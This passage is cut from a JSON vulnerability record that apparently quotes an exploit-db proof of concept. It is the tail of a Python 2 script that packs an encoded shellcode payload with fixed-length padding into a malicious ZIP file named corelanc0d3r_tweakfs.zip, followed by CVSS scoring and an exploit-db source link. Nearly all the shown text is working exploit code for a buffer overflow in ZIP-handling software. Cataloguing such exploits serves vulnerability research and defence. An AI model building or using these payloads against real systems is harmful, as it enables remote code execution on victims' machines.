\"xBc2orrsutqKkMXQLq4uWMYKSsXprV8gPupPhpcFPsTecQxu5bLaq0nCXEpqs0oBR1x\"\r\nbuff += \"cTepqrRY3XPopwbNSUvQ9Yk8pLWTWeMYyqdqzrBrV3saPRyozpTqo0rpKO1EUXA\"\r\nbuff += \"\\x43\" * (4064-len(buff)) # 4064\r\nbuff += \".txt\"\r\n\r\n\r\nprint \" [+] Writing payload to file corelanc0d3r_tweakfs.zip\"\r\nmefile = open('corelanc0d3r_tweakfs.zip','w');\r\nmefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);\r\nmefile.close()\r\nprint \" [+] Wrote \" + str(len(buff))+ \" bytes to file\"", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/12293/"}]}